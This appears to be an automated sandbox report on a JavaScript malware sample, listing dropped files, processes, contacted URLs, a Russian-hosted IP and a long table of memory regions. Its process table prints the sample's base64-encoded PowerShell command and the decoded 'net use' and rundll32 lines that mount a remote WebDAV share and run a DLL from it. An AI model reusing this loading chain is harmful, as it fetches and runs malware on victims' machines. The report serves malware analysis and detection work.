Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
634624051181209037.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptl4kggm.me0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnf1x5ra.alu.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\634624051181209037.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMwAxADgANQAyADIANQA4ADkAMAAxADAAMAAyADYALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\318522589010026.dll,Entry
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://94.159.113.48:8888/U
|
unknown
|
||
http://94.159.113.48:8888/pace
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
http://www.microsoft.2
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://94.159.113.48:8888/
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
94.159.113.48
|
unknown
|
Russian Federation
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1DEF66DE000
|
heap
|
page read and write
|
||
1DEF81E3000
|
heap
|
page read and write
|
||
7FFB22715000
|
unknown
|
page readonly
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
1DEF820C000
|
heap
|
page read and write
|
||
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
1DEF63E3000
|
heap
|
page read and write
|
||
27415B60000
|
heap
|
page read and write
|
||
A73B1FE000
|
stack
|
page read and write
|
||
1DEF66DD000
|
heap
|
page read and write
|
||
7FFAAC5F6000
|
trusted library allocation
|
page read and write
|
||
22D56577000
|
heap
|
page execute and read and write
|
||
7FFAAC600000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF6462000
|
heap
|
page read and write
|
||
A9B5AFE000
|
stack
|
page read and write
|
||
1DEF647C000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
1DEF645B000
|
heap
|
page read and write
|
||
27415EA4000
|
heap
|
page read and write
|
||
7FFB22730000
|
unknown
|
page readonly
|
||
1CDFE782000
|
heap
|
page read and write
|
||
1CDFE750000
|
heap
|
page read and write
|
||
27418EF0000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
7FFB22706000
|
unknown
|
page readonly
|
||
A73B7FF000
|
stack
|
page read and write
|
||
1DEF81C4000
|
heap
|
page read and write
|
||
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
1DEF81EA000
|
heap
|
page read and write
|
||
7FFB22750000
|
unknown
|
page read and write
|
||
1DEF81F7000
|
heap
|
page read and write
|
||
27415B89000
|
heap
|
page read and write
|
||
1CDFE77C000
|
heap
|
page read and write
|
||
22D6EDE0000
|
heap
|
page read and write
|
||
1DEF8315000
|
heap
|
page read and write
|
||
A9B55DE000
|
stack
|
page read and write
|
||
1DEF66DC000
|
heap
|
page read and write
|
||
27418EF3000
|
heap
|
page read and write
|
||
A9B5B3E000
|
stack
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
1DEF8218000
|
heap
|
page read and write
|
||
1DEF81EA000
|
heap
|
page read and write
|
||
27415B76000
|
heap
|
page read and write
|
||
5FDF2FF000
|
stack
|
page read and write
|
||
1DEF6460000
|
heap
|
page read and write
|
||
22D56F1A000
|
trusted library allocation
|
page read and write
|
||
1CDFE7B8000
|
heap
|
page read and write
|
||
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
22D6ECD0000
|
heap
|
page read and write
|
||
22D54EE5000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D54C42000
|
heap
|
page read and write
|
||
22D56B0B000
|
trusted library allocation
|
page read and write
|
||
1DEF8213000
|
heap
|
page read and write
|
||
22D56DB0000
|
trusted library allocation
|
page read and write
|
||
1DEF641A000
|
heap
|
page read and write
|
||
7DF4C6820000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
E31C2FE000
|
stack
|
page read and write
|
||
A73B6FF000
|
stack
|
page read and write
|
||
22D66A71000
|
trusted library allocation
|
page read and write
|
||
7FFB22746000
|
unknown
|
page readonly
|
||
7FFAAC810000
|
trusted library allocation
|
page read and write
|
||
22D54C7B000
|
heap
|
page read and write
|
||
27415B61000
|
heap
|
page read and write
|
||
5FDF07B000
|
stack
|
page read and write
|
||
22D56BC6000
|
trusted library allocation
|
page read and write
|
||
1CDFE7AC000
|
heap
|
page read and write
|
||
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
1DEF6467000
|
heap
|
page read and write
|
||
22D6F0B0000
|
heap
|
page read and write
|
||
1DEF81E6000
|
heap
|
page read and write
|
||
22D56B8F000
|
trusted library allocation
|
page read and write
|
||
27415EAB000
|
heap
|
page read and write
|
||
1DEF81E2000
|
heap
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
A9B5C39000
|
stack
|
page read and write
|
||
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
1DEF6300000
|
heap
|
page read and write
|
||
7FFAAC700000
|
trusted library allocation
|
page execute and read and write
|
||
1CDFE6B0000
|
heap
|
page read and write
|
||
27415B65000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D56B74000
|
trusted library allocation
|
page read and write
|
||
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
A9B5D3E000
|
stack
|
page read and write
|
||
22D56B77000
|
trusted library allocation
|
page read and write
|
||
1CDFE6A0000
|
heap
|
page read and write
|
||
1CDFE78D000
|
heap
|
page read and write
|
||
22D54CB7000
|
heap
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page execute and read and write
|
||
22D56580000
|
heap
|
page read and write
|
||
1DEF62D0000
|
heap
|
page read and write
|
||
7FFAAC820000
|
trusted library allocation
|
page read and write
|
||
A9B54D3000
|
stack
|
page read and write
|
||
7FFB226F1000
|
unknown
|
page execute read
|
||
1DEF66D9000
|
heap
|
page read and write
|
||
22D6EBC5000
|
heap
|
page read and write
|
||
22D56A8B000
|
trusted library allocation
|
page read and write
|
||
1DEF81C7000
|
heap
|
page read and write
|
||
7FFAAC543000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB22710000
|
unknown
|
page read and write
|
||
1DEF81FC000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
5FDF27C000
|
stack
|
page read and write
|
||
1DEF8210000
|
heap
|
page read and write
|
||
1DEF641A000
|
heap
|
page read and write
|
||
1DEF6390000
|
heap
|
page read and write
|
||
22D6EDB0000
|
heap
|
page execute and read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
7FFAAC840000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
1DEF62E0000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D569B0000
|
heap
|
page execute and read and write
|
||
22D54C00000
|
heap
|
page read and write
|
||
1DEF8315000
|
heap
|
page read and write
|
||
A9B555F000
|
stack
|
page read and write
|
||
A9B5EBE000
|
stack
|
page read and write
|
||
1DEF6470000
|
heap
|
page read and write
|
||
22D6EC61000
|
heap
|
page read and write
|
||
22D6EC76000
|
heap
|
page read and write
|
||
27415B8C000
|
heap
|
page read and write
|
||
1DEF81EC000
|
heap
|
page read and write
|
||
22D56A60000
|
heap
|
page read and write
|
||
1CDFE720000
|
remote allocation
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D54C77000
|
heap
|
page read and write
|
||
22D54B00000
|
heap
|
page read and write
|
||
1DEF8213000
|
heap
|
page read and write
|
||
22D56500000
|
heap
|
page read and write
|
||
27417650000
|
heap
|
page read and write
|
||
1CDFE786000
|
heap
|
page read and write
|
||
22D54C8F000
|
heap
|
page read and write
|
||
1DEF81FA000
|
heap
|
page read and write
|
||
22D56550000
|
trusted library allocation
|
page read and write
|
||
22D56ADE000
|
trusted library allocation
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
27415B81000
|
heap
|
page read and write
|
||
7FFAAC544000
|
trusted library allocation
|
page read and write
|
||
1DEF66D5000
|
heap
|
page read and write
|
||
27415EA0000
|
heap
|
page read and write
|
||
7FFB22731000
|
unknown
|
page execute read
|
||
7FFAAC850000
|
trusted library allocation
|
page read and write
|
||
1DEF81E7000
|
heap
|
page read and write
|
||
22D54EE0000
|
heap
|
page read and write
|
||
1DEF66D9000
|
heap
|
page read and write
|
||
1DEF6460000
|
heap
|
page read and write
|
||
1DEF81C6000
|
heap
|
page read and write
|
||
27415AF0000
|
heap
|
page read and write
|
||
27415B4E000
|
heap
|
page read and write
|
||
22D54BE0000
|
heap
|
page read and write
|
||
22D6EBE1000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
22D54D13000
|
heap
|
page read and write
|
||
22D56530000
|
trusted library allocation
|
page read and write
|
||
1DEF8342000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D54C30000
|
heap
|
page read and write
|
||
A9B5BB7000
|
stack
|
page read and write
|
||
7FFAAC660000
|
trusted library allocation
|
page execute and read and write
|
||
22D6EBEF000
|
heap
|
page read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D56A71000
|
trusted library allocation
|
page read and write
|
||
1DEF81F2000
|
heap
|
page read and write
|
||
27415B5C000
|
heap
|
page read and write
|
||
22D56B7A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
A9B587F000
|
stack
|
page read and write
|
||
1DEF6473000
|
heap
|
page read and write
|
||
1DEF6469000
|
heap
|
page read and write
|
||
1DEF81D5000
|
heap
|
page read and write
|
||
1CDFE730000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D6EC30000
|
heap
|
page read and write
|
||
1DEF6485000
|
heap
|
page read and write
|
||
1CDFE734000
|
heap
|
page read and write
|
||
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
1DEF6478000
|
heap
|
page read and write
|
||
5FDF1FE000
|
stack
|
page read and write
|
||
27415AE0000
|
heap
|
page read and write
|
||
27415B5C000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
1DEF66DD000
|
heap
|
page read and write
|
||
1CDFE720000
|
remote allocation
|
page read and write
|
||
22D66A80000
|
trusted library allocation
|
page read and write
|
||
1DEF6460000
|
heap
|
page read and write
|
||
A9B5CBB000
|
stack
|
page read and write
|
||
7FFAAC6F1000
|
trusted library allocation
|
page read and write
|
||
1DEF6465000
|
heap
|
page read and write
|
||
1DEF66DE000
|
heap
|
page read and write
|
||
A9B5A7E000
|
stack
|
page read and write
|
||
22D56B8B000
|
trusted library allocation
|
page read and write
|
||
22D6EC5C000
|
heap
|
page read and write
|
||
A73B9FD000
|
stack
|
page read and write
|
||
27415B6D000
|
heap
|
page read and write
|
||
1DEF8224000
|
heap
|
page read and write
|
||
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
1DEF81E7000
|
heap
|
page read and write
|
||
1DEF81E5000
|
heap
|
page read and write
|
||
7FFAAC5FC000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF63CD000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D56940000
|
trusted library allocation
|
page read and write
|
||
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
22D56E2E000
|
trusted library allocation
|
page read and write
|
||
1DEF81F2000
|
heap
|
page read and write
|
||
7FFAAC626000
|
trusted library allocation
|
page execute and read and write
|
||
22D6EB80000
|
heap
|
page read and write
|
||
1DEF6462000
|
heap
|
page read and write
|
||
A73BBFB000
|
stack
|
page read and write
|
||
22D54C73000
|
heap
|
page read and write
|
||
27415B48000
|
heap
|
page read and write
|
||
A9B5AF8000
|
stack
|
page read and write
|
||
A73B0F5000
|
stack
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
22D6ECB0000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
1DEF6476000
|
heap
|
page read and write
|
||
1DEF8275000
|
heap
|
page read and write
|
||
22D66ADE000
|
trusted library allocation
|
page read and write
|
||
22D6EBBE000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
27415B10000
|
heap
|
page read and write
|
||
7FFB22752000
|
unknown
|
page readonly
|
||
A9B59FF000
|
stack
|
page read and write
|
||
A73B2FF000
|
stack
|
page read and write
|
||
7FFAAC6FA000
|
trusted library allocation
|
page read and write
|
||
22D54C6F000
|
heap
|
page read and write
|
||
1DEF81EE000
|
heap
|
page read and write
|
||
27419390000
|
trusted library allocation
|
page read and write
|
||
1DEF647B000
|
heap
|
page read and write
|
||
7FFAAC722000
|
trusted library allocation
|
page read and write
|
||
22D56585000
|
heap
|
page read and write
|
||
27418EB0000
|
heap
|
page read and write
|
||
1DEF82C1000
|
heap
|
page read and write
|
||
7FFAAC54D000
|
trusted library allocation
|
page execute and read and write
|
||
1CDFE757000
|
heap
|
page read and write
|
||
22D54CBD000
|
heap
|
page read and write
|
||
1DEF81C5000
|
heap
|
page read and write
|
||
22D56570000
|
heap
|
page execute and read and write
|
||
A9B5DBE000
|
stack
|
page read and write
|
||
1DEF6486000
|
heap
|
page read and write
|
||
1DEF63A0000
|
heap
|
page read and write
|
||
7FFB22755000
|
unknown
|
page readonly
|
||
1CDFE6D0000
|
heap
|
page read and write
|
||
22D56B88000
|
trusted library allocation
|
page read and write
|
||
A9B58FD000
|
stack
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
22D56F74000
|
trusted library allocation
|
page read and write
|
||
A73B5FE000
|
stack
|
page read and write
|
||
22D56ABF000
|
trusted library allocation
|
page read and write
|
||
1DEF81EF000
|
heap
|
page read and write
|
||
1DEF81C8000
|
heap
|
page read and write
|
||
1DEF6462000
|
heap
|
page read and write
|
||
E31C37E000
|
stack
|
page read and write
|
||
1CDFE7BF000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
1CDFE784000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
1DEF66D0000
|
heap
|
page read and write
|
||
27415B40000
|
heap
|
page read and write
|
||
1DEF66DB000
|
heap
|
page read and write
|
||
A9B5F3C000
|
stack
|
page read and write
|
||
1DEF8213000
|
heap
|
page read and write
|
||
1DEF81E2000
|
heap
|
page read and write
|
||
A9B597E000
|
stack
|
page read and write
|
||
E31C27A000
|
stack
|
page read and write
|
||
22D56AD8000
|
trusted library allocation
|
page read and write
|
||
22D6EB85000
|
heap
|
page read and write
|
||
1DEF81F1000
|
heap
|
page read and write
|
||
1CDFE7A6000
|
heap
|
page read and write
|
||
7FFB22712000
|
unknown
|
page readonly
|
||
1CDFE78F000
|
heap
|
page read and write
|
||
27415B70000
|
heap
|
page read and write
|
||
22D56DF7000
|
trusted library allocation
|
page read and write
|
||
1DEF6425000
|
heap
|
page read and write
|
||
A73B3FD000
|
stack
|
page read and write
|
||
1DEF81C2000
|
heap
|
page read and write
|
||
1DEF81EA000
|
heap
|
page read and write
|
||
A73B8FE000
|
stack
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page execute and read and write
|
||
A9B5E3E000
|
stack
|
page read and write
|
||
5FDF17E000
|
stack
|
page read and write
|
||
1DEF8200000
|
heap
|
page read and write
|
||
1DEF81CD000
|
heap
|
page read and write
|
||
22D56BCD000
|
trusted library allocation
|
page read and write
|
||
1DEF646A000
|
heap
|
page read and write
|
||
1DEF81FA000
|
heap
|
page read and write
|
||
1DEF66DE000
|
heap
|
page read and write
|
||
1DEF82C0000
|
heap
|
page read and write
|
||
1DEF63CE000
|
heap
|
page read and write
|
||
1DEF81DC000
|
heap
|
page read and write
|
||
7FFB226F0000
|
unknown
|
page readonly
|
||
1CDFE720000
|
remote allocation
|
page read and write
|
||
22D56560000
|
heap
|
page readonly
|
||
5FDF0FE000
|
stack
|
page read and write
|
||
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
1DEF81C0000
|
heap
|
page read and write
|